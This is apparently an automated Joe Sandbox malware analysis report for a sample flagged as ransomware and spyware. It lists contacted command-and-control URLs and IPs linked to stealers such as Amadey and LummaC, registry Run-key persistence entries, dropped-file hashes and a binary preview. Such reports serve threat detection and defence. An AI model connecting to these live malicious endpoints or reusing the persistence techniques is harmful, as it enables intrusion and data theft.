https://support.mozilla.org/en-GB/products/firefoxgro.allizom.troppus.	rodda.exe, 0000000C.00000003.14512695628.0000000006997000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14738182154.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp, vg9qcBa.exe, 00000027.00000003.14555137876.0000000003AF3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes	svchost.exe, 00000012.00000003.15044394903.0000027A4097A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/1005824001	926085a3ba.exe, 0000000D.00000002.14317543790.0000020F03C30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/en-GB/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=fire	rodda.exe, 0000000C.00000003.14512695628.0000000006997000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14738182154.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp, vg9qcBa.exe, 00000027.00000003.14555137876.0000000003AF3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://82.115.223.222:8888/1612916fc5ef4b799f4406315a37b75e/:9	926085a3ba.exe, 00000005.00000002.14168270876.000001B530EC3000.00000004.00000020.00020000.00000000.sdmp, 926085a3ba.exe, 00000005.00000003.14164473908.000001B530EC3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gemini.google.com/app?q=	vg9qcBa.exe, 00000027.00000003.14471723604.000000000373B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.eicar.org/eicar.com.txt	rodda.exe, 0000000C.00000003.14435131152.000000000652E000.00000004.00000800.00020000.00000000.sdmp, rodda.exe, 0000000C.00000003.14435131152.0000000006516000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14662194345.0000000005B82000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14660812805.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, vg9qcBa.exe, 00000027.00000003.14474612909.00000000038D2000.00000004.00000800.00020000.00000000.sdmp, vg9qcBa.exe, 00000027.00000003.14474612909.00000000038ED000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=4Vb3xc8UazdB&a	rodda.exe, 0000000C.00000003.14278138507.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, rodda.exe, 0000000C.00000003.14543249992.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, rodda.exe, 0000000C.00000002.14661617200.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, rodda.exe, 0000000C.00000003.14580311185.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, rodda.exe, 0000000C.00000003.14277992421.0000000006497000.00000004.00000800.00020000.00000000.sdmp, rodda.exe, 0000000C.00000003.14277992421.0000000006491000.00000004.00000800.00020000.00000000.sdmp, rodda.exe, 0000000C.00000003.14631475291.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, rodda.exe, 0000000C.00000003.14509974020.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14298483583.0000000001280000.00000004.00000020.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14298426149.00000000012D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-connect.cyou/x	vg9qcBa.exe, 00000027.00000003.14511590204.00000000009D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/&	rodda.exe, 0000000C.00000003.14278138507.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	rodda.exe, 0000000C.00000003.14278138507.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, rodda.exe, 0000000C.00000003.14543249992.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, rodda.exe, 0000000C.00000002.14661617200.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, rodda.exe, 0000000C.00000003.14580311185.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, rodda.exe, 0000000C.00000003.14277992421.0000000006497000.00000004.00000800.00020000.00000000.sdmp, rodda.exe, 0000000C.00000003.14631475291.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, rodda.exe, 0000000C.00000003.14509974020.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14298426149.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/r	926085a3ba.exe, 0000000D.00000002.14317543790.0000020F03C30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive-connect.cyou/h	vg9qcBa.exe, 00000027.00000003.14623929230.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://output-fog.cyou/api	Selection.com, 00000032.00000002.15607940886.0000000001376000.00000004.00000020.00020000.00000000.sdmp, Selection.com, 00000032.00000002.15608488881.0000000001549000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://output-fog.cyou/llocat	Selection.com, 00000032.00000002.15608136346.00000000013E1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/scg	svchost.exe, 00000012.00000003.17161557363.0000027A4093C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.17160737874.0000027A4093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.17163760065.0000027A40943000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.17161656331.0000027A40941000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n	rodda.exe, 0000000C.00000003.14435131152.0000000006523000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14660060615.0000000005B77000.00000004.00000800.00020000.00000000.sdmp, vg9qcBa.exe, 00000027.00000003.14474612909.00000000038DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	L.exe, 0000000E.00000003.14298811335.000000000128F000.00000004.00000020.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14298811335.0000000001296000.00000004.00000020.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14326036374.000000000128F000.00000004.00000020.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14622999980.000000000127E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://Passport.NET/STS	svchost.exe, 00000012.00000003.15349727808.0000027A40981000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80600i	svchost.exe, 00000012.00000002.17165414033.0000027A3FE54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.17164339406.0000027A3FE50000.00000004.00000020.00020000.00000000.sdmp	false		high
https://marshal-zhukov.com/apis	L.exe, 0000000E.00000003.14884163005.0000000005B33000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14696136351.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000002.14892851746.0000000005B35000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14819589833.0000000005B33000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14697257454.0000000005B30000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	rodda.exe, 0000000C.00000003.14436086508.0000000006782000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14663533397.0000000005DA2000.00000004.00000800.00020000.00000000.sdmp, vg9qcBa.exe, 00000027.00000003.14471723604.000000000373B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301	rodda.exe, 0000000C.00000003.14435131152.0000000006523000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14660060615.0000000005B77000.00000004.00000800.00020000.00000000.sdmp, vg9qcBa.exe, 00000027.00000003.14474612909.00000000038DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://marshal-zhukov.com/apiW	L.exe, 0000000E.00000003.14663022292.0000000005B2A000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14664309915.0000000005B31000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14664141160.0000000005B2A000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14660060615.0000000005B2A000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14774394215.0000000005B2D000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14696136351.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14775410329.0000000005B32000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14697257454.0000000005B30000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14663410641.0000000005B2A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://drive-connect.cyou/X	vg9qcBa.exe, 00000027.00000003.14762274085.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, vg9qcBa.exe, 00000027.00000002.14767119960.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, vg9qcBa.exe, 00000027.00000003.14638130213.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, vg9qcBa.exe, 00000027.00000003.14764857379.00000000009DE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://broadcast.st.dl.eccdnx.com	L.exe, 0000000E.00000003.14298811335.000000000128F000.00000004.00000020.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14298811335.0000000001296000.00000004.00000020.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14326036374.000000000128F000.00000004.00000020.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14622999980.000000000127E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	rodda.exe, 0000000C.00000003.14277992421.0000000006497000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14298426149.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://82.115.223.222/406315a37b75e/	926085a3ba.exe, 00000005.00000002.14168270876.000001B530EF9000.00000004.00000020.00020000.00000000.sdmp, 926085a3ba.exe, 00000005.00000003.14164833179.000001B530EF9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	rodda.exe, 0000000C.00000003.14277992421.0000000006497000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14298426149.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14298426149.00000000012D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/	TaskbarMonitorInstaller.exe, 00000035.00000000.14524168263.000002B1CF642000.00000002.00000001.01000000.00000015.sdmp, RegAsm.exe, 00000037.00000002.14534841536.000001FC39592000.00000002.00000001.01000000.00000017.sdmp	false		high
http://x1.c.lencr.org/0	rodda.exe, 0000000C.00000003.14508166750.000000000677E000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14737308340.0000000005B76000.00000004.00000800.00020000.00000000.sdmp, vg9qcBa.exe, 00000027.00000003.14554274485.00000000038DE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	rodda.exe, 0000000C.00000003.14508166750.000000000677E000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14737308340.0000000005B76000.00000004.00000800.00020000.00000000.sdmp, vg9qcBa.exe, 00000027.00000003.14554274485.00000000038DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.c(om/	rodda.exe, 0000000C.00000003.14435027499.0000000006778000.00000004.00000800.00020000.00000000.sdmp, L.exe, 0000000E.00000003.14659798280.0000000005D98000.00000004.00000800.00020000.00000000.sdmp, vg9qcBa.exe, 00000027.00000003.14474230284.000000000372E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
82.115.223.222	unknown	Russian Federation	209821	MIDNET-ASTK-TelecomRU	false
82.115.223.189	unknown	Russian Federation	209821	MIDNET-ASTK-TelecomRU	false
142.250.101.113	unknown	United States	15169	GOOGLEUS	false
142.251.2.84	unknown	United States	15169	GOOGLEUS	false
74.125.137.138	unknown	United States	15169	GOOGLEUS	false
172.67.139.78	unknown	United States	13335	CLOUDFLARENETUS	false
103.21.221.64	unknown	unknown	9905	LINKNET-ID-APLinknetASNID	false
185.199.109.133	unknown	Netherlands	54113	FASTLYUS	false
142.251.2.139	unknown	United States	15169	GOOGLEUS	false
23.66.133.162	unknown	United States	16625	AKAMAI-ASUS	false
104.16.230.132	unknown	United States	13335	CLOUDFLARENETUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false
104.21.10.92	unknown	United States	13335	CLOUDFLARENETUS	false
142.250.101.106	unknown	United States	15169	GOOGLEUS	false
9.9.9.9	unknown	United States	19281	QUAD9-AS-1US	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
74.125.137.84	unknown	United States	15169	GOOGLEUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
40.126.62.130	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.251.2.94	unknown	United States	15169	GOOGLEUS	false
142.250.101.101	unknown	United States	15169	GOOGLEUS	false
20.189.173.21	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
208.95.112.1	unknown	United States	53334	TUT-ASUS	false
172.67.160.80	unknown	United States	13335	CLOUDFLARENETUS	false
74.125.137.104	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.101.95	unknown	United States	15169	GOOGLEUS	false
142.250.101.94	unknown	United States	15169	GOOGLEUS	false
142.251.2.101	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.11.20
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1565375
Start date and time:	2024-11-29 17:15:29 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 21m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	61
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.winEXE@130/115@0/32
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Max analysis timeout: 600s exceeded, the analysis took too long
Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): dllhost.exe
Execution Graph export aborted for target 926085a3ba.exe, PID 3564 because there are no executed function
Execution Graph export aborted for target L.exe, PID 2716 because there are no executed function
Execution Graph export aborted for target file.exe, PID 2136 because it is empty
Execution Graph export aborted for target rodda.exe, PID 7600 because there are no executed function
Execution Graph export aborted for target skotes.exe, PID 2140 because there are no executed function
Execution Graph export aborted for target skotes.exe, PID 7400 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Skipping network analysis since amount of network traffic is too extensive
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
11:18:00	API Interceptor	22461461x Sleep call for process: skotes.exe modified
11:18:17	API Interceptor	104x Sleep call for process: rodda.exe modified
11:18:23	API Interceptor	67086x Sleep call for process: L.exe modified
11:18:27	API Interceptor	1x Sleep call for process: WerFault.exe modified
11:18:30	API Interceptor	1x Sleep call for process: 0fVlNye.exe modified
11:18:39	API Interceptor	8x Sleep call for process: vg9qcBa.exe modified
11:18:42	API Interceptor	1x Sleep call for process: VBVEd6f.exe modified
11:18:49	API Interceptor	1x Sleep call for process: RegAsm.exe modified
11:19:21	API Interceptor	2479x Sleep call for process: Selection.com modified
11:19:23	API Interceptor	2724658x Sleep call for process: kreon.exe modified
17:17:42	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
17:18:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 926085a3ba.exe C:\Users\user\AppData\Local\Temp\1005824001\926085a3ba.exe
17:18:22	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kreon C:\Users\user\AppData\Local\kreon.exe
17:18:30	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 926085a3ba.exe C:\Users\user\AppData\Local\Temp\1005824001\926085a3ba.exe
17:18:38	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kreon C:\Users\user\AppData\Local\kreon.exe
17:18:46	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url
17:19:54	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 6bbef8c4b5.exe C:\Users\user\AppData\Local\Temp\1010314001\6bbef8c4b5.exe
17:20:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run b33b84068d.exe C:\Users\user\AppData\Local\Temp\1010315001\b33b84068d.exe
17:20:10	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 7f9e2922de.exe C:\Users\user\AppData\Local\Temp\1010316001\7f9e2922de.exe
17:20:18	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 454245d14b.exe C:\Users\user\AppData\Local\Temp\1010317001\454245d14b.exe
17:20:26	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 6bbef8c4b5.exe C:\Users\user\AppData\Local\Temp\1010314001\6bbef8c4b5.exe
17:20:34	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run b33b84068d.exe C:\Users\user\AppData\Local\Temp\1010315001\b33b84068d.exe
17:20:43	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 7f9e2922de.exe C:\Users\user\AppData\Local\Temp\1010316001\7f9e2922de.exe
17:20:51	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 454245d14b.exe C:\Users\user\AppData\Local\Temp\1010317001\454245d14b.exe
17:24:17	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

LLM Input / Output

Input	Output
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=6bbef8c4b5.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This application could not be started", "prominent_button_name": "Yes", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=6bbef8c4b5.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This application could not be started", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: https://learn.microsoft.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://learn.microsoft.com
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=6bbef8c4b5.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=6bbef8c4b5.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This application could not be started", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=6bbef8c4b5.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=6bbef8c4b5.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Nymaim, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Nymaim, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
82.115.223.222	file.exe	Get hash	malicious	Clipboard Hijacker	Browse	82.115.223.222:8888/8b6a914772ff4cb1bee52d0dcaa5124a/
	file.exe	Get hash	malicious	Clipboard Hijacker	Browse	82.115.223.222:8888/8b6a914772ff4cb1bee52d0dcaa5124a/
	HnJdZm51Xl.exe	Get hash	malicious	Amadey, Clipboard Hijacker	Browse	82.115.223.222:8888/1612916fc5ef4b799f4406315a37b75e/
	file.exe	Get hash	malicious	Unknown	Browse	82.115.223.222:8888/1612916fc5ef4b799f4406315a37b75e/
	file.exe	Get hash	malicious	Unknown	Browse	82.115.223.222:8888/1612916fc5ef4b799f4406315a37b75e/
	file.exe	Get hash	malicious	Clipboard Hijacker	Browse	82.115.223.222:8888/928b54fd677e44be88ba882062f7a296/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MIDNET-ASTK-TelecomRU	file.exe	Get hash	malicious	Clipboard Hijacker	Browse	82.115.223.222
	file.exe	Get hash	malicious	Clipboard Hijacker	Browse	82.115.223.222
	HnJdZm51Xl.exe	Get hash	malicious	Amadey, Clipboard Hijacker	Browse	82.115.223.189
	BWuMwnE7tw.exe	Get hash	malicious	Unknown	Browse	82.115.223.189
	file.exe	Get hash	malicious	Unknown	Browse	82.115.223.189
	file.exe	Get hash	malicious	Unknown	Browse	82.115.223.189
	file.exe	Get hash	malicious	Clipboard Hijacker	Browse	82.115.223.222
	PhysXCooking64.dll.dll	Get hash	malicious	Bazar Loader	Browse	82.115.223.39
	FW3x3p4eZ5.msi	Get hash	malicious	Bazar Loader, BruteRatel	Browse	82.115.223.39
	PhysXCooking64.dll.dll	Get hash	malicious	Bazar Loader, BruteRatel	Browse	82.115.223.39
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Nymaim, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files\TaskbarMonitor\Newtonsoft.Json.dll	DeepLSetup.msi	Get hash	malicious	Unknown	Browse
	bootstraper.exe	Get hash	malicious	Unknown	Browse
	FiddlerSetup.5.0.20245.10105-latest.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse
	oFVTW2Uwwk.exe	Get hash	malicious	Unknown	Browse
	vs_BuildTools.zip	Get hash	malicious	Unknown	Browse
	ZOj46Y8Mb1.exe	Get hash	malicious	Unknown	Browse
	Client.Center.for.Configuration.Manager_v1.0.7.2.msi	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.MalwareX-gen.17953.1345.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.MalwareX-gen.17953.1345.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Trojan-Ransom.Win32.Zerber.gkca.4990.15640.exe	Get hash	malicious	Unknown	Browse

Process:	C:\Users\user\AppData\Local\Temp\1009882001\TaskbarMonitorInstaller.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	711952
Entropy (8bit):	5.967185619483575
Encrypted:	false
SSDEEP:	12288:GBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUO:GBjk38WuBcAbwoA/BkjSHXP36RMG/
MD5:	195FFB7167DB3219B217C4FD439EEDD6
SHA1:	1E76E6099570EDE620B76ED47CF8D03A936D49F8
SHA-256:	E1E27AF7B07EEEDF5CE71A9255F0422816A6FC5849A483C6714E1B472044FA9D
SHA-512:	56EB7F070929B239642DAB729537DDE2C2287BDB852AD9E80B5358C74B14BC2B2DDED910D0E3B6304EA27EB587E5F19DB0A92E1CBAE6A70FB20B4EF05057E4AC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: DeepLSetup.msi, Detection: malicious, Browse Filename: bootstraper.exe, Detection: malicious, Browse Filename: FiddlerSetup.5.0.20245.10105-latest.exe, Detection: malicious, Browse Filename: oFVTW2Uwwk.exe, Detection: malicious, Browse Filename: vs_BuildTools.zip, Detection: malicious, Browse Filename: ZOj46Y8Mb1.exe, Detection: malicious, Browse Filename: Client.Center.for.Configuration.Manager_v1.0.7.2.msi, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.MalwareX-gen.17953.1345.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.MalwareX-gen.17953.1345.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan-Ransom.Win32.Zerber.gkca.4990.15640.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ............`....................................O......................../.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(......(....^.(...........%...}....:.(......}....:.(......}......(....:.(......}......{......(......(....:.(......}......{.....(.............}.....(......{.....X.....}......0...........-.~.....~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..\|....(......._..{........+,..{\|....3...{{......(....,...{{.....{}.......-.....0...........-.r...ps....z.o......-.~.....~....

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.020169946609725
Encrypted:	false
SSDEEP:	96:wOFa+wF1espKhHpQ7yuSKvXIxcQJc64cECcw3Cv1M+HbHgnoW6HeonsFERDRbkO6:P6eImn8oGvjNKN2Du76hfAlx8Y
